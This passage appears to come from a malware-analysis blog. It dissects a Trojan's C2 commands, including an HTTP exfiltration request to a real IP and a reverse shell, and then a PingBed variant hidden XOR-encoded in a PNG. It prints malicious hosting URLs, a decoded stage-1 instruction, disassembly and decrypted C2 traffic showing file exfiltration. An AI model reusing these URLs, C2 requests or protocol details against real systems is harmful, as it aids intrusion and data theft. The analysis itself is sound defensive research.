    • This key is used to decrypt the data following the 24 byte header.  In this case (0x35DDA18E…)

Offset      0  1  2  3  4  5  6  7   8  9  A  B  C  D  E  F

00000000   2D 2D 2D 2D 2D 2D 2D 2D  2D 2D 2D 2D 2D 2D 2D 2D   ----------------
00000010   2D 2D 2D 2D 2D 2D 2D 2D  2D 2D 2D 37 64 36 65 61   -----------7d6ea
00000020   32 64 34 30 35 66 63 0D  0A 43 6F 6E 74 65 6E 74   2d405fc  Content
00000030   2D 44 69 73 70 6F 73 69  74 69 6F 6E 3A 20 66 6F   -Disposition: fo
00000040   72 6D 2D 64 61 74 61 3B  20 6E 61 6D 65 3D 22 20   rm-data; name="
00000050   38 32 31 22 0D 0A 0D 0A  23 0D 2A 1F 0E 0F 20 BF   821"    # *    ¿
00000060   F7 10 00 00 AA 00 00 00  00 00 00 00 F2 02 00 00   ÷   ª       ò  
00000070   35 DD A1 8E 91 8A 8C B2  25 25 84 88 B2 8B 9C 8B   5Ý¡Ž‘ŠŒ²%%„ˆ²‹œ‹
00000080   A4 15 0F E0 F3 8E 91 8A  8C B2 25 0F E7 C2 ED E1   ¤  àóŽ‘ŠŒ²% çÂíá
00000090   8A 95 A4 3B 2B B1 82 B8  E1 AA A1 84 1C 40 99 A6   Š•¤;+±‚¸áª¡„ @™¦
000000A0   93 BC D9 B9 82 1C 4D 9B  A8 94 BC A0 F2 E1 79 37   “¼Ù¹‚ M›¨”¼ òáy7
000000B0   DD 99 AE 9A 8A 8B F9 2D  7D B1 F3 8E B1 AA AC 92   Ý™®šŠ‹ù-}±óŽ±ª¬’
000000C0   05 59 9A AE FD A9 AC AC  9F 07 57 9D AE 84 E2 CF    Yš®ý©¬¬Ÿ W®„âÏ
000000D0   CB E1 41 72 BD 94 B1 87  9E 97 B9 66 60 AC 9F D4   ËáAr½”±‡ž—¹f`¬ŸÔ
000000E0   BB A0 AB 83 0D 48 88 B4  89 C8 B8 AD 83 00 4A 86   » «ƒ Hˆ´‰È¸­ƒ J†
000000F0   B3 89 B1 F3 CE EF 78 0C  A7 9F AF 9E 90 9B B2 3B   ³‰±óÎïx §Ÿ¯ž›²;
00000100   2B B1 82 B8 E1 AA A1 84  1C 40 99 A6 93 BC D9 B9   +±‚¸áª¡„ @™¦“¼Ù¹

• When command 0xA0 is called, the Trojan makes a call to URLDownloadToFile, and so this is a separate connection to the C2 node over TCP port 80.  The data that is exfiltrated is not obfuscated in any way.  The requests looks something like this:

GET /XbUPTB.asp?ID=1349506 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET 4.0C; .NET4.0E)
Host: 69.39.133.114
Connection: Keep-Alive
Cookie: NTESSESS=s9st0hzccBi; CONNECTID=01081318220

• When the reverse shell command (0×64) is called the following happens:
  • This Trojan comes with its own copy of cmd.exe embedded in the Trojan file (starting at file-offset 0×16104 of hello.exe).
  • When this Trojan provides reverse shell functionality to the C2 node, it extracts this copy of cmd.exe and saves it in the user’s Temp folder (C:\DOCUME~1\username\LOCALS~1\Temp\nveda.exe), and then executes it.
  • File nveda.exe has the following characteristics:

File Name:  nveda.exe
File Size:  95232 bytes
MD5:        2ba4b3217335461e85ff54e1ee75c8b5
SHA1:       db488d5c044004c0bed2c5bf2563fd918ea76878
PE Time:    0x4188DA98 [Wed Nov 03 13:18:16 2004 UTC]
PEID Sig:   UPX 3.02
Sections (3):
 Name      Entropy  MD5
 UPX0      0.0      d41d8cd98f00b204e9800998ecf8427e
 UPX1      7.99     9daa99bd65d283caca1a117ce4971d6c
 .rsrc     3.03     345d2db10ab606cb5edff48efd14de50

• Today I will take a look at some malware that is obfuscated within a PNG file.
• Based on comparison to other samples, the Trojan at hand is a variant of Trojan.PingBed.
• Let me start by saying that this malware is Stage2 malware, that is, another malicious file (Stage1 malware) would already be present on a system in order to download, decrypt and execute the Trojan found within the PNG file.
• The Stage1 malware would request an HTML file that contains a Base 64 encoded instruction that instructs it which file to download and how to execute it. I do not have a copy of this Stage1 malware. When I get my hands on a sample I will post an analysis of it.
• An example of this HTML file is hosted here (as of the date of this post):
  

 http://www.systatservices.com/default3.html

• This HTML file contains a Base 64 encoded comment that is the instruction for the Stage1 Trojan:

<!-- dWdlc2hzdGF0LnBuZyAxMi4xODUuMjIyLjggNDQz -->
Decodes to:
ugeshstat.png 12.185.222.8 443

• This decoded instruction seems to instruct the Trojan to download a file named shstat.png and execute it with the IP address and port number as its arguments.
• The PNG file in question is hosted here (as of the date of this post):

http://www.systatservices.com/shstat.png

• The characteristics of this PNG file are shown below:

File Name:  shstat.png
File Size:  193633 bytes
MD5:        5af7cad4c0feec683e6d2d20abb981f6
SHA1:       6e1d3e36dcee3d75bda5b69423dc56605b6f1bc6

• Opening this PNG file will NOT infect your computer because we are not dealing with any exploits here. In fact, this PNG file will render just fine even though it contains an obfuscated executable within it.

• The obfuscated executable is contained within the zTXt chunk of the PNG file. Typically this chunk would contain compressed textual data, however if this data is not valid, it is silently ignored by the graphic applications. I guess this makes it an excellent place to hide something.
• So, the Stage1 Trojan would parse this PNG file for the zTXt chunk, extract the obfuscated binary, and execute it. The obfuscation is a simple XOR with 0xFF (inverted bits). Here is the beginning of the zTXt chunk and the beginning of the de-obfuscated executable:

Offset      0  1  2  3  4  5  6  7   8  9  A  B  C  D  E  F

0000B240   00 D4 D1 72 77 C4 7C C6  64 00 02 42 00 7A 54 58    ÔÑrwÄ|Æd  B zTX
0000B250   74 4D 5A 90 00 03 00 00  00 04 00 00 00 FF FF 00   tMZ          ÿÿ
0000B260   00 B8 00 00 00 00 00 00  00 40 00 00 00 00 00 00    ¸       @     
0000B270   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00                  
0000B280   00 00 00 00 00 00 00 00  00 00 00 00 00 E0 00 00                à 
0000B290   00 0E 1F BA 0E 00 B4 09  CD 21 B8 01 4C CD 21 54      º  ´ Í!¸ LÍ!T
0000B2A0   68 69 73 20 70 72 6F 67  72 61 6D 20 63 61 6E 6E   his program cann
0000B2B0   6F 74 20 62 65 20 72 75  6E 20 69 6E 20 44 4F 53   ot be run in DOS
0000B2C0   20 6D 6F 64 65 2E 0D 0D  0A 24 00 00 00 00 00 00    mode.   $

• If we copy out the executable we end up with the following file, which I will name shstat.exe:

File Name:  shstat.exe
File Size:  147968 bytes
MD5:        74cd481b9628e4f1a053c67e6967b695
SHA1:       807ab3dea5bea326f03e4a44c123953200a9ed4a
PE Time:    0x4D25DCED [Thu Jan 06 15:17:01 2011 UTC]
AV:         0/41 (0%) [VirusTotal]
PEID Sig:   Microsoft Visual C++ 8
Sections (4):
Name      Entropy  MD5
.text     6.65     d90aaef60a2746dae14a93df14ca090b
.rdata    5.13     65f1ccc1f17039943feb963704a71c0b
.data     3.75     f6a71b81ab7423d4f6bbfd3fba406611
.rsrc     5.11     d5ecc406ee2be45ed510958b0d4f326a

TROJAN ANALYSIS – shstat.exe

• As mentioned, this Trojan requires two arguments in order to run: an IP address and port number.
• This Trojan uses SSL for its network communication, so the traffic samples that follow are after the encryption provided by SSL has been removed.
• This Trojan starts by sending two transmissions to the C2 node.
• The first transmission contains what appears to be a type of signature (keyboard pattern): !@#$%$#@!
• We also see that the first DWORD specifies the total length of the data (0×11 = 17d).

00000000  11 00 00 00 00 00 00 00  21 40 23 25 24 5e 23 40 ........ !@#%$^#@
00000010  21                                               !

• The second transmission contains some basic system information:

00000011  f4 00 00 00 08 00 00 00  76 69 63 74 69 6d 00 00 ........ victim..
00000021  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
00000031  00 00 00 00 00 00 00 00  31 39 32 2e 31 36 38 2e ........ 192.168.
00000041  31 2e 31 30 30 00 00 00  00 00 00 00 00 00 00 00 1.100... ........
00000051  00 00 00 00 00 00 00 00  02 00 00 00 02 00 00 00 ........ ........
00000061  00 00 00 00 00 00 00 00  9c 00 00 00 05 00 00 00 ........ ........
00000071  01 00 00 00 28 0a 00 00  02 00 00 00 53 65 72 76 ....(... ....Serv
00000081  69 63 65 20 50 61 63 6b  20 33 00 00 00 00 00 00 ice Pack  3......
00000091  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
000000A1  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
000000B1  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
000000C1  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
000000D1  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
000000E1  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
000000F1  00 00 00 00 00 00 00 00  00 00 00 00 03 00 00 00 ........ ........
00000101  00 01 01 00                                      ....

• The Trojan parses the received data for the command that is expected to be stored on the second DWORD.
• The code responsible for this is shown below (EDI points at the beginning of the received data):

0040486E   .  8B47 04           MOV EAX, DWORD PTR DS:[EDI+4]
00404871   .  83C4 0C           ADD ESP, 0C
00404874   .  83F8 07           CMP EAX, 7       
00404877   .  0F8F E1020000     JG shstat.00404B5E
0040487D   .  74 4C             JE SHORT shstat.004048CB
0040487F   .  48                DEC EAX
00404880   .  0F84 C4020000     JE shstat.00404B4A
00404886   .  48                DEC EAX
00404887   .  0F84 48010000     JE shstat.004049D5
0040488D   .  48                DEC EAX
0040488E   .  74 6B             JE SHORT shstat.004048FB
00404890   .  48                DEC EAX
00404891   .  74 43             JE SHORT shstat.004048D6
00404893   .  48                DEC EAX
00404894   .  0F85 DA020000     JNZ shstat.00404B74
0040489A   .  83C7 08           ADD EDI, 8    
0040489D   .  57                PUSH EDI
0040489E   .  E8 6C420000       CALL shstat.00408B0F

• The following is a list of the commands and their purpose:

01000000 -> Command shell
02000000 -> Download a file (from C2 node to Victim)
03000000 -> Upload a file (from victim to C2 node)
04000000 -> Write to a file (used in conjunction with command 2)
05000000 -> TBD
06000000 -> TBD.
07000000 -> Uninstall Trojan (deletes executable).
0A000000 -> TDB
0C000000 -> Process List
0D000000 -> Kill a process
0E000000 -> Drive list
10000000 -> Execute / Run As

• Here is some PCAP data that was generated by my interaction with this Trojan using a Perl script I wrote.   As a reminder, what you are seeing below would be encrypted by the SSL session key.

00000000  11 00 00 00 00 00 00 00  21 40 23 25 24 5e 23 40 ........ !@#%$^#@
00000010  21                                               !
00000011  f4 00 00 00 08 00 00 00  76 69 63 74 69 6d 00 00 ........ victim..
00000021  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
00000031  00 00 00 00 00 00 00 00  31 39 32 2e 31 36 38 2e ........ 192.168.
00000041  31 2e 31 30 30 00 00 00  00 00 00 00 00 00 00 00 1.100... ........
00000051  00 00 00 00 00 00 00 00  02 00 00 00 02 00 00 00 ........ ........
00000061  00 00 00 00 00 00 00 00  9c 00 00 00 05 00 00 00 ........ ........
00000071  01 00 00 00 28 0a 00 00  02 00 00 00 53 65 72 76 ....(... ....Serv
00000081  69 63 65 20 50 61 63 6b  20 33 00 00 00 00 00 00 ice Pack  3......
00000091  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
000000A1  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
000000B1  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
000000C1  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
000000D1  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
000000E1  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
000000F1  00 00 00 00 00 00 00 00  00 00 00 00 03 00 00 00 ........ ........
00000101  00 01 01 00                                      ....
 00000000  08 00 00 00 01 00 00 00                          ........
00000105  14 00 00 00 0a 00 00 00  43 3a 5c 4d 41 4c 57 41 ........ C:\MALWA
00000115  52 45 3e 00                                      RE>.
 00000008  04 00 00 00 02 00 00 00  00 00 00 00 00 00 00 00 ........ ........
 00000018  62 61 64 2e 74 78 74 20  62 61 64 2e 74 78 74 00 bad.txt  bad.txt.
00000119  18 00 00 00 02 00 00 00  01 00 00 00 00 00 00 00 ........ ........
00000129  62 61 64 2e 74 78 74 00                          bad.txt. 
 00000028  2f 00 00 00 04 00 00 00  54 68 69 73 20 64 61 74 /....... This dat
 00000038  61 20 67 6f 69 6e 67 20  66 72 6f 6d 20 43 32 20 a going  from C2 
 00000048  6e 6f 64 65 20 74 6f 20  76 69 63 74 69 6d 2e    node to  victim.
 00000057  33 00 00 00 02 00 00 00  04 00 00 00 ff ff ff ff 3....... ........
00000131  10 00 00 00 02 00 00 00  04 00 00 00 ff ff ff ff ........ ........
 00000067  04 00 00 00 03 00 00 00  00 00 00 00 00 00 00 00 ........ ........
 00000077  73 65 63 72 65 74 2e 74  78 74 20 73 65 63 72 65 secret.t xt secre
 00000087  74 2e 74 78 74 00                                t.txt.
00000141  1b 00 00 00 03 00 00 00  01 00 00 00 ff ff ff ff ........ ........
00000151  73 65 63 72 65 74 2e 74  78 74 00                secret.t xt.
 0000008D  04 00 00 00 03 00 00 00  01 00 00 00 00 00 00 00 ........ ........
 0000009D  73 65 63 72 65 74 2e 74  78 74 20 73 65 63 72 65 secret.t xt secre
 000000AD  74 2e 74 78 74 00                                t.txt.
0000015C  3b 00 00 00 04 00 00 00  74 68 69 73 20 64 61 74 ;....... this dat
0000016C  61 20 62 65 69 6e 67 20  65 78 66 69 6c 65 64 20 a being  exfiled 
0000017C  66 72 6f 6d 20 74 68 65  20 76 69 63 74 69 6d 20 from the  victim 
0000018C  74 6f 20 43 32 20 6e 6f  64 65 2e                to C2 no de.
00000197  10 00 00 00 03 00 00 00  04 00 00 00 ff ff ff ff ........ ........
 000000B3  08 00 00 00 0c 00 00 00                          ........ 
000001A7  14 04 00 00 0c 00 00 00  2d 30 09 20 20 20 20 20 ........ -0.     
000001B7  20 20 20 20 20 20 20 20  20 20 20 20 20 20 20 20                  
000001C7  20 20 20 0a 2d 34 09 53  79 73 74 65 6d 20 20 20    .-4.S ystem   
000001D7  20 20 20 20 20 20 20 20  20 20 20 20 20 20 20 0a                 .
000001E7  2d 33 38 30 09 73 6d 73  73 2e 65 78 65 20 20 20 -380.sms s.exe   
000001F7  20 20 20 20 20 20 20 20  20 20 20 20 20 4e 54 20               NT 
00000207  41 55 54 48 4f 52 49 54  59 5c 53 59 53 54 45 4d AUTHORIT Y\SYSTEM
00000217  0a 2d 36 31 32 09 63 73  72 73 73 2e 65 78 65 20 .-612.cs rss.exe 
00000227  20 20 20 20 20 20 20 20  20 20 20 20 20 20 4e 54                NT
00000237  20 41 55 54 48 4f 52 49  54 59 5c 53 59 53 54 45  AUTHORI TY\SYSTE
00000247  4d 0a 2d 36 33 36 09 77  69 6e 6c 6f 67 6f 6e 2e M.-636.w inlogon.
00000257  65 78 65 20 20 20 20 20  20 20 20 20 20 20 20 4e exe             N
00000267  54 20 41 55 54 48 4f 52  49 54 59 5c 53 59 53 54 T AUTHOR ITY\SYST
00000277  45 4d 0a 2d 36 38 30 09  73 65 72 76 69 63 65 73 EM.-680. services
00000287  2e 65 78 65 20 20 20 20  20 20 20 20 20 20 20 20 .exe             
00000297  4e 54 20 41 55 54 48 4f  52 49 54 59 5c 53 59 53 NT AUTHO RITY\SYS
000002A7  54 45 4d 0a 2d 36 39 32  09 6c 73 61 73 73 2e 65 TEM.-692 .lsass.e
000002B7  78 65 20 20 20 20 20 20  20 20 20 20 20 20 20 20 xe               
000002C7  20 4e 54 20 41 55 54 48  4f 52 49 54 59 5c 53 59  NT AUTH ORITY\SY
000002D7  53 54 45 4d 0a 2d 38 36  34 09 76 6d 61 63 74 68 STEM.-86 4.vmacth
000002E7  6c 70 2e 65 78 65 20 20  20 20 20 20 20 20 20 20 lp.exe           
000002F7  20 20 4e 54 20 41 55 54  48 4f 52 49 54 59 5c 53   NT AUT HORITY\S
00000307  59 53 54 45 4d 0a 2d 38  39 32 09 73 76 63 68 6f YSTEM.-8 92.svcho
00000317  73 74 2e 65 78 65 20 20  20 20 20 20 20 20 20 20 st.exe           
00000327  20 20 20 4e 54 20 41 55  54 48 4f 52 49 54 59 5c    NT AU THORITY\
00000337  53 59 53 54 45 4d 0a 2d  39 36 34 09 73 76 63 68 SYSTEM.- 964.svch
00000347  6f 73 74 2e 65 78 65 20  20 20 20 20 20 20 20 20 ost.exe          
00000357  20 20 20 20 0a 2d 31 30  37 32 09 73 76 63 68 6f     .-10 72.svcho
00000367  73 74 2e 65 78 65 20 20  20 20 20 20 20 20 20 20 st.exe           
00000377  20 20 20 4e 54 20 41 55  54 48 4f 52 49 54 59 5c    NT AU THORITY\
00000387  53 59 53 54 45 4d 0a 2d  31 31 32 38 09 73 76 63 SYSTEM.- 1128.svc
00000397  68 6f 73 74 2e 65 78 65  20 20 20 20 20 20 20 20 host.exe         
000003A7  20 20 20 20 20 0a 2d 31  32 38 30 09 73 76 63 68      .-1 280.svch
000003B7  6f 73 74 2e 65 78 65 20  20 20 20 20 20 20 20 20 ost.exe          
000003C7  20 20 20 20 0a 2d 31 36  30 34 09 65 78 70 6c 6f     .-16 04.explo
000003D7  72 65 72 2e 65 78 65 20  20 20 20 20 20 20 20 20 rer.exe          
000003E7  20 20 20 56 49 43 54 49  4d 5c 75 73 65 72 6e 61    VICTI M\userna
000003F7  6d 65 0a 2d 31 36 38 30  09 56 4d 77 61 72 65 54 me.-1680 .VMwareT
00000407  72 61 79 2e 65 78 65 20  20 20 20 20 20 20 20 20 ray.exe          
00000417  20 56 49 43 54 49 4d 5c  75 73 65 72 6e 61 6d 65  VICTIM\ username
00000427  0a 2d 31 37 30 38 09 56  4d 77 61 72 65 55 73 65 .-1708.V MwareUse
00000437  72 2e 65 78 65 20 20 20  20 20 20 20 20 20 20 56 r.exe           V
00000447  49 43 54 49 4d 5c 75 73  65 72 6e 61 6d 65 0a 2d ICTIM\us ername.-
00000457  31 37 38 30 09 73 76 63  68 6f 73 74 2e 65 78 65 1780.svc host.exe
00000467  20 20 20 20 20 20 20 20  20 20 20 20 20 0a 2d 31               .-1
00000477  39 32 38 09 76 6d 74 6f  6f 6c 73 64 2e 65 78 65 928.vmto olsd.exe
00000487  20 20 20 20 20 20 20 20  20 20 20 20 4e 54 20 41              NT A
00000497  55 54 48 4f 52 49 54 59  5c 53 59 53 54 45 4d 0a UTHORITY \SYSTEM.
000004A7  2d 31 37 34 34 09 63 6d  64 2e 65 78 65 20 20 20 -1744.cm d.exe   
000004B7  20 20 20 20 20 20 20 20  20 20 20 20 20 20 56 49                VI
000004C7  43 54 49 4d 5c 75 73 65  72 6e 61 6d 65 0a 2d 31 CTIM\use rname.-1
000004D7  31 37 36 09 57 69 6e 48  65 78 2e 65 78 65 20 20 176.WinH ex.exe  
000004E7  20 20 20 20 20 20 20 20  20 20 20 20 56 49 43 54              VICT
000004F7  49 4d 5c 75 73 65 72 6e  61 6d 65 0a 2d 33 39 32 IM\usern ame.-392
00000507  09 69 64 61 67 2e 65 78  65 20 20 20 20 20 20 20 .idag.ex e       
00000517  20 20 20 20 20 20 20 20  20 56 49 43 54 49 4d 5c           VICTIM\
00000527  75 73 65 72 6e 61 6d 65  0a 2d 31 36 34 38 09 73 username .-1648.s
00000537  74 75 6e 6e 65 6c 2e 65  78 65 20 20 20 20 20 20 tunnel.e xe      
00000547  20 20 20 20 20 20 20 56  49 43 54 49 4d 5c 75 73        V ICTIM\us
00000557  65 72 6e 61 6d 65 0a 2d  31 32 34 34 09 49 6d 6d ername.- 1244.Imm
00000567  75 6e 69 74 79 44 65 62  75 67 67 65 72 2e 65 78 unityDeb ugger.ex
00000577  65 20 20 20 20 56 49 43  54 49 4d 5c 75 73 65 72 e    VIC TIM\user
00000587  6e 61 6d 65 0a 2d 31 33  33 32 09 73 68 73 74 61 name.-13 32.shsta
00000597  74 2e 65 78 65 20 20 20  20 20 20 20 20 20 20 20 t.exe            
000005A7  20 20 20 56 49 43 54 49  4d 5c 75 73 65 72 6e 61    VICTI M\userna
000005B7  6d 65 0a 00                                      me..
 000000BB  74 00 00 00 10 00 00 00  00 00 00 00 00 00 00 00 t....... ........
 000000CB  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
 000000DB  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
 000000EB  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
 000000FB  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
 0000010B  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
 0000011B  00 00 00 00 00 00 00 00  6e 6f 74 65 70 61 64 2e ........ notepad.
 0000012B  65 78 65 00                                      exe.
 0000012F  71 00 00 00 10 00 00 00  00 00 00 00 00 00 00 00 q....... ........
 0000013F  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
 0000014F  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
 0000015F  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
 0000016F  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
 0000017F  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
 0000018F  00 00 00 00 00 00 00 00  63 61 6c 63 2e 65 78 65 ........ calc.exe
 0000019F  00                                               .
 000001A0  08 00 00 00 0c 00 00 00                          ........
000005BB  6e 04 00 00 0c 00 00 00  2d 30 09 20 20 20 20 20 n....... -0.     
000005CB  20 20 20 20 20 20 20 20  20 20 20 20 20 20 20 20                  
000005DB  20 20 20 0a 2d 34 09 53  79 73 74 65 6d 20 20 20    .-4.S ystem   
000005EB  20 20 20 20 20 20 20 20  20 20 20 20 20 20 20 0a                 .
000005FB  2d 33 38 30 09 73 6d 73  73 2e 65 78 65 20 20 20 -380.sms s.exe   
0000060B  20 20 20 20 20 20 20 20  20 20 20 20 20 4e 54 20               NT 
0000061B  41 55 54 48 4f 52 49 54  59 5c 53 59 53 54 45 4d AUTHORIT Y\SYSTEM
0000062B  0a 2d 36 31 32 09 63 73  72 73 73 2e 65 78 65 20 .-612.cs rss.exe 
0000063B  20 20 20 20 20 20 20 20  20 20 20 20 20 20 4e 54                NT
0000064B  20 41 55 54 48 4f 52 49  54 59 5c 53 59 53 54 45  AUTHORI TY\SYSTE
0000065B  4d 0a 2d 36 33 36 09 77  69 6e 6c 6f 67 6f 6e 2e M.-636.w inlogon.
0000066B  65 78 65 20 20 20 20 20  20 20 20 20 20 20 20 4e exe             N
0000067B  54 20 41 55 54 48 4f 52  49 54 59 5c 53 59 53 54 T AUTHOR ITY\SYST
0000068B  45 4d 0a 2d 36 38 30 09  73 65 72 76 69 63 65 73 EM.-680. services
0000069B  2e 65 78 65 20 20 20 20  20 20 20 20 20 20 20 20 .exe             
000006AB  4e 54 20 41 55 54 48 4f  52 49 54 59 5c 53 59 53 NT AUTHO RITY\SYS
000006BB  54 45 4d 0a 2d 36 39 32  09 6c 73 61 73 73 2e 65 TEM.-692 .lsass.e
000006CB  78 65 20 20 20 20 20 20  20 20 20 20 20 20 20 20 xe               
000006DB  20 4e 54 20 41 55 54 48  4f 52 49 54 59 5c 53 59  NT AUTH ORITY\SY
000006EB  53 54 45 4d 0a 2d 38 36  34 09 76 6d 61 63 74 68 STEM.-86 4.vmacth
000006FB  6c 70 2e 65 78 65 20 20  20 20 20 20 20 20 20 20 lp.exe           
0000070B  20 20 4e 54 20 41 55 54  48 4f 52 49 54 59 5c 53   NT AUT HORITY\S
0000071B  59 53 54 45 4d 0a 2d 38  39 32 09 73 76 63 68 6f YSTEM.-8 92.svcho
0000072B  73 74 2e 65 78 65 20 20  20 20 20 20 20 20 20 20 st.exe           
0000073B  20 20 20 4e 54 20 41 55  54 48 4f 52 49 54 59 5c    NT AU THORITY\
0000074B  53 59 53 54 45 4d 0a 2d  39 36 34 09 73 76 63 68 SYSTEM.- 964.svch
0000075B  6f 73 74 2e 65 78 65 20  20 20 20 20 20 20 20 20 ost.exe          
0000076B  20 20 20 20 0a 2d 31 30  37 32 09 73 76 63 68 6f     .-10 72.svcho
0000077B  73 74 2e 65 78 65 20 20  20 20 20 20 20 20 20 20 st.exe           
0000078B  20 20 20 4e 54 20 41 55  54 48 4f 52 49 54 59 5c    NT AU THORITY\
0000079B  53 59 53 54 45 4d 0a 2d  31 31 32 38 09 73 76 63 SYSTEM.- 1128.svc
000007AB  68 6f 73 74 2e 65 78 65  20 20 20 20 20 20 20 20 host.exe         
000007BB  20 20 20 20 20 0a 2d 31  32 38 30 09 73 76 63 68      .-1 280.svch
000007CB  6f 73 74 2e 65 78 65 20  20 20 20 20 20 20 20 20 ost.exe          
000007DB  20 20 20 20 0a 2d 31 36  30 34 09 65 78 70 6c 6f     .-16 04.explo
000007EB  72 65 72 2e 65 78 65 20  20 20 20 20 20 20 20 20 rer.exe          
000007FB  20 20 20 56 49 43 54 49  4d 5c 75 73 65 72 6e 61    VICTI M\userna
0000080B  6d 65 0a 2d 31 36 38 30  09 56 4d 77 61 72 65 54 me.-1680 .VMwareT
0000081B  72 61 79 2e 65 78 65 20  20 20 20 20 20 20 20 20 ray.exe          
0000082B  20 56 49 43 54 49 4d 5c  75 73 65 72 6e 61 6d 65  VICTIM\ username
0000083B  0a 2d 31 37 30 38 09 56  4d 77 61 72 65 55 73 65 .-1708.V MwareUse
0000084B  72 2e 65 78 65 20 20 20  20 20 20 20 20 20 20 56 r.exe           V
0000085B  49 43 54 49 4d 5c 75 73  65 72 6e 61 6d 65 0a 2d ICTIM\us ername.-
0000086B  31 37 38 30 09 73 76 63  68 6f 73 74 2e 65 78 65 1780.svc host.exe
0000087B  20 20 20 20 20 20 20 20  20 20 20 20 20 0a 2d 31               .-1
0000088B  39 32 38 09 76 6d 74 6f  6f 6c 73 64 2e 65 78 65 928.vmto olsd.exe
0000089B  20 20 20 20 20 20 20 20  20 20 20 20 4e 54 20 41              NT A
000008AB  55 54 48 4f 52 49 54 59  5c 53 59 53 54 45 4d 0a UTHORITY \SYSTEM.
000008BB  2d 31 37 34 34 09 63 6d  64 2e 65 78 65 20 20 20 -1744.cm d.exe   
000008CB  20 20 20 20 20 20 20 20  20 20 20 20 20 20 56 49                VI
000008DB  43 54 49 4d 5c 75 73 65  72 6e 61 6d 65 0a 2d 31 CTIM\use rname.-1
000008EB  31 37 36 09 57 69 6e 48  65 78 2e 65 78 65 20 20 176.WinH ex.exe  
000008FB  20 20 20 20 20 20 20 20  20 20 20 20 56 49 43 54              VICT
0000090B  49 4d 5c 75 73 65 72 6e  61 6d 65 0a 2d 33 39 32 IM\usern ame.-392
0000091B  09 69 64 61 67 2e 65 78  65 20 20 20 20 20 20 20 .idag.ex e       
0000092B  20 20 20 20 20 20 20 20  20 56 49 43 54 49 4d 5c           VICTIM\
0000093B  75 73 65 72 6e 61 6d 65  0a 2d 31 36 34 38 09 73 username .-1648.s
0000094B  74 75 6e 6e 65 6c 2e 65  78 65 20 20 20 20 20 20 tunnel.e xe      
0000095B  20 20 20 20 20 20 20 56  49 43 54 49 4d 5c 75 73        V ICTIM\us
0000096B  65 72 6e 61 6d 65 0a 2d  31 32 34 34 09 49 6d 6d ername.- 1244.Imm
0000097B  75 6e 69 74 79 44 65 62  75 67 67 65 72 2e 65 78 unityDeb ugger.ex
0000098B  65 20 20 20 20 56 49 43  54 49 4d 5c 75 73 65 72 e    VIC TIM\user
0000099B  6e 61 6d 65 0a 2d 31 33  33 32 09 73 68 73 74 61 name.-13 32.shsta
000009AB  74 2e 65 78 65 20 20 20  20 20 20 20 20 20 20 20 t.exe            
000009BB  20 20 20 56 49 43 54 49  4d 5c 75 73 65 72 6e 61    VICTI M\userna
000009CB  6d 65 0a 2d 34 39 36 09  6e 6f 74 65 70 61 64 2e me.-496. notepad.
000009DB  65 78 65 20 20 20 20 20  20 20 20 20 20 20 20 20 exe              
000009EB  56 49 43 54 49 4d 5c 75  73 65 72 6e 61 6d 65 0a VICTIM\u sername.
000009FB  2d 39 34 38 09 63 61 6c  63 2e 65 78 65 20 20 20 -948.cal c.exe   
00000A0B  20 20 20 20 20 20 20 20  20 20 20 20 20 56 49 43               VIC
00000A1B  54 49 4d 5c 75 73 65 72  6e 61 6d 65 0a 00       TIM\user name..
 000001A8  04 00 00 00 0d 00 00 00  34 39 36 00             ........ 496.
00000A29  25 00 00 00 0d 00 00 00  4b 69 6c 6c 69 6e 67 20 %....... Killing 
00000A39  70 72 6f 63 65 73 73 20  34 39 36 20 73 75 63 63 process  496 succ
00000A49  65 65 64 2e 00                                   eed..
 000001B4  04 00 00 00 0d 00 00 00  39 34 38 00             ........ 948.
00000A4E  25 00 00 00 0d 00 00 00  4b 69 6c 6c 69 6e 67 20 %....... Killing 
00000A5E  70 72 6f 63 65 73 73 20  39 34 38 20 73 75 63 63 process  948 succ
00000A6E  65 65 64 2e 00                                   eed..
 000001C0  08 00 00 00 0c 00 00 00                          ........ 
00000A73  01 04 00 00 0c 00 00 00  2d 30 09 20 20 20 20 20 ........ -0.     
00000A83  20 20 20 20 20 20 20 20  20 20 20 20 20 20 20 20                  
00000A93  20 20 20 0a 2d 34 09 53  79 73 74 65 6d 20 20 20    .-4.S ystem   
00000AA3  20 20 20 20 20 20 20 20  20 20 20 20 20 20 20 0a                 .
00000AB3  2d 33 38 30 09 73 6d 73  73 2e 65 78 65 20 20 20 -380.sms s.exe   
00000AC3  20 20 20 20 20 20 20 20  20 20 20 20 20 4e 54 20               NT 
00000AD3  41 55 54 48 4f 52 49 54  59 5c 53 59 53 54 45 4d AUTHORIT Y\SYSTEM
